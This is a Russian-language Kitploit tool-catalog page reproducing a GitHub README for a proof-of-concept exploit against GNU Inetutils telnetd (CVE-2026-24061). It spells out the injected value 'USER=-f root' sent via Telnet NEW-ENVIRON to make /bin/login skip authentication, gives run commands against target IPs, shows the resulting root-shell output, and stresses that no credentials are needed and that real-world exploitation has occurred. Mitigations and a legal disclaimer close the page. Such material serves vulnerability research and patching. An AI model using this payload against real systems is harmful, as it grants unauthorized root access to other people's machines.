Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — Эксплойт proof-of-concept для обхода аутентификации в GNU Inetutils telnetd (CVE-2026-24061), который запускает root-оболочку через сформированную переменную USER в NEW-ENVIRON. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияИнструмент Удаленного Доступа
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

Эксплойт proof-of-concept для обхода аутентификации в GNU Inetutils telnetd (CVE-2026-24061), который запускает root-оболочку через сформированную переменную USER в NEW-ENVIRON.

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Обзор

Этот репозиторий содержит эксплойт Proof‑of‑Concept для уязвимости удалённого обхода аутентификации в GNU Inetutils telnetd.

Проблема возникает из-за того, что telnetd некорректно обрабатывает переменную окружения USER, полученную через Telnet‑согласование NEW‑ENVIRON, перед вызовом /bin/login.

При передаче:

root@kitploit:~
USER=-f root

telnetd фактически выполняет:

root@kitploit:~
/bin/login -f root

что обходит аутентификацию и немедленно предоставляет root‑shell.

  • Продукт: GNU Inetutils telnetd
  • Затронутые версии: ≤ 2.7
  • Порт: 23/TCP
  • Аутентификация: не требуется
  • Воздействие: обход аутентификации → root‑shell
  • Привилегии: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (Critical)

⚙️ Технические детали

Telnet NEW‑ENVIRON позволяет клиентам задавать переменные окружения во время согласования сессии.

Уязвимый telnetd передаёт USER напрямую в login:

root@kitploit:~
/bin/login -f "$USER"

Атакующий задаёт:

root@kitploit:~
USER=-f root

Результат:

root@kitploit:~
/bin/login -f root

Флаг -f указывает login пропустить аутентификацию, предоставляя доступ с правами root.


📦 Требования

  • Python 3
  • telnetlib (стандартная библиотека)
  • Целевая система с уязвимым inetutils‑telnetd ≤ 2.7
  • Telnet‑сервис доступен по TCP/23

Внешние зависимости не требуются.


🚀 Использование

1️⃣ Запуск эксплойта

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ Необязательный порт

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ Ожидаемый результат

Если система уязвима:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

Вы получаете интерактивный root‑shell.


🧪 Пример

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

Вывод:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 Примечания

  • Эксплойт работает мгновенно
  • Перебор не требуется
  • Учётные данные не требуются
  • Зафиксированы случаи эксплуатации в реальных атаках
  • Работает на стандартных установках inetutils‑telnetd в Debian/Ubuntu
  • Не работает, если telnetd пропатчен или заменён (например, OpenBSD telnetd)

🛡️ Меры защиты

  • Обновите GNU Inetutils до версии ≥ 2.8
  • Отключите telnet‑сервис
  • Замените на SSH
  • Заблокируйте TCP/23 на межсетевом экране
  • Проверьте пакеты inetutils‑telnetd

📊 Схема атаки PoC

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session

⚠️ Отказ от ответственности

Данный эксплойт предоставлен для:

  • Научных исследований в области безопасности
  • Авторизованного тестирования на проникновение
  • Проверки защитных мер

Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете разрешения, является незаконным.

Скачать инструмент